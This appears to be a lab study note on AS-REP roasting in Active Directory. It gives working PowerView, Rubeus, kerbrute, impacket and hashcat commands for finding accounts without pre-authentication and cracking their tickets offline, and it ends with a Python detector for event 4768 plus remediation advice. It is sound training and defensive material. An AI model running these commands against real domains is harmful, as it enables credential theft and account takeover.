# ASREProasting Introduction

- Obtain a TGT for any account that has the [Do not require Kerberos pre-authentication](https://www.tenable.com/blog/how-to-stop-the-kerberos-pre-authentication-attack-in-active-directory) setting enabled
- Many vendor installation guides specify that their service account be configured in this way
- The authentication service reply (AS-REP) is encrypted with the account's password, and any domain user can request it
- This can be subjected to an offline password attack using a tool such as `hashcat` or `john`
- ASREPRoasting is similar to Kerberoasting, but it involves attacking the AS-REP instead of the TGS-REP
- An SPN is not required
- This setting can be enumerated with `PowerView` or built-in tools such as the PowerShell AD module
- The attack itself can be performed with the [Rubeus](https://github.com/GhostPack/Rubeus) toolkit and other tools to obtain the ticket for the target account
- Furthermore, if an attacker has `GenericWrite` or `GenericAll` permissions over an account, they can enable this attribute, obtain the AS-REP ticket for offline cracking to recover the account's password, and then disable the attribute again

## Enumerate ASREP from Windows

- Enumerate for the `DONT_REQ_PREAUTH` value using `Get-DomainUser`

```powershell
PS C:\htb> Import-Module .\PowerView.ps1
PS C:\htb> Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl

samaccountname     : mmorgan
userprincipalname  : [email protected]
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD, DONT_REQ_PREAUTH
```

![[images/Pasted image 20251106143545.png]]

- Retrieve the TGT using `Rubeus`
- Use the `/nowrap` flag so the TGT is not column-wrapped and is retrieved in a format that can be fed straight into `hashcat`

```powershell
.\Rubeus.exe asreproast /user:mmorgan /nowrap /format:hashcat
```

![[images/Pasted image 20251106143736.png]]

- Crack the TGT offline using `hashcat` (mode 18200 is the `krb5asrep` format)

```bash
hashcat -m 18200 ilfreight_asrep /usr/share/wordlists/rockyou.txt
```

![[images/Pasted image 20251106143746.png]]

## Enumerate ASREP from Linux

- Use the `jsmith.txt` user list and `kerbrute userenum` to retrieve valid users in the domain and automatically retrieve any `krb5asrep` TGTs
- Crack the TGT offline using `hashcat`

```bash
kerbrute userenum -d inlanefreight.local --dc 172.16.5.5 /opt/jsmith.txt
```

![[images/Pasted image 20251106144122.png]]

- Alternatively, use `GetNPUsers.py` from `impacket` to hunt for all users with Kerberos pre-authentication not required
- Crack the TGT offline using `hashcat`

```bash
GetNPUsers.py INLANEFREIGHT.LOCAL/ -dc-ip 172.16.5.5 -no-pass -usersfile valid_ad_users
```

![[images/Pasted image 20251106144432.png]]
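Both the Windows and Linux procedures above leave the same footprint on the domain controller: a successful Security event 4768 (Kerberos TGT requested) with Pre-Authentication Type 0. The following Python is an added detection example, not part of the original note; the 4768 records it processes are constructed, and the field names mirror the event's own (`TargetUserName`, `PreAuthType`, `TicketEncryptionType`, `IpAddress`, `Status`).

```python
"""Flag AS-REP roasting in Windows Security event 4768 (TGT requested) records.

A successful 4768 with PreAuthType 0 means the KDC issued an AS-REP without
pre-authentication: the account has DONT_REQ_PREAUTH set and the requester now
holds crackable material. Several such events from one source in a short window
match a kerbrute/GetNPUsers sweep. The sample records below are constructed.
"""
from collections import defaultdict
from datetime import datetime, timedelta

SAMPLE_4768 = [
    {"time": "2025-11-06T14:41:00", "TargetUserName": "mmorgan", "PreAuthType": "0",
     "TicketEncryptionType": "0x17", "IpAddress": "172.16.5.225", "Status": "0x0"},
    {"time": "2025-11-06T14:41:01", "TargetUserName": "svc_backup", "PreAuthType": "0",
     "TicketEncryptionType": "0x17", "IpAddress": "172.16.5.225", "Status": "0x0"},
    {"time": "2025-11-06T14:41:02", "TargetUserName": "jdoe", "PreAuthType": "2",
     "TicketEncryptionType": "0x12", "IpAddress": "172.16.5.50", "Status": "0x0"},
    {"time": "2025-11-06T14:41:03", "TargetUserName": "nobody", "PreAuthType": "0",
     "TicketEncryptionType": "0x17", "IpAddress": "172.16.5.225", "Status": "0x6"},
]

def is_asrep_roast(rec):
    """True for a TGT actually issued (Status 0x0) with no pre-auth (PreAuthType 0).
    Failures such as Status 0x6 (unknown principal) are username guessing, not a roast."""
    return rec["PreAuthType"] == "0" and rec["Status"] == "0x0"

def find_asrep_roasting(records, window=timedelta(minutes=5), threshold=2):
    """Return (hits, sweeping_sources): hits holds one (account, src_ip, etype) per
    roastable AS-REP; sweeping_sources lists source IPs that obtained AS-REPs for
    at least `threshold` distinct accounts within `window`."""
    hits, by_src = [], defaultdict(list)
    for rec in records:
        if not is_asrep_roast(rec):
            continue
        hits.append((rec["TargetUserName"], rec["IpAddress"], rec["TicketEncryptionType"]))
        by_src[rec["IpAddress"]].append((datetime.fromisoformat(rec["time"]), rec["TargetUserName"]))
    sweeping = []
    for src, events in by_src.items():
        events.sort()
        for i, (t0, _) in enumerate(events):
            if len({u for t, u in events[i:] if t - t0 <= window}) >= threshold:
                sweeping.append(src)
                break
    return hits, sweeping

if __name__ == "__main__":
    hits, sweeping = find_asrep_roasting(SAMPLE_4768)
    for account, src, etype in hits:  # etype 0x17 (RC4) is what hashcat mode 18200 cracks
        print(f"AS-REP without pre-auth: {account} from {src}, etype {etype}; clear DONT_REQ_PREAUTH")
    for src in sweeping:
        print(f"{src} collected AS-REPs for several accounts: enumeration sweep")
```

Each hit names an account whose `DONT_REQ_PREAUTH` flag should be cleared (or whose password should be long and random if a vendor insists on the setting); a sweeping source is the host to triage first.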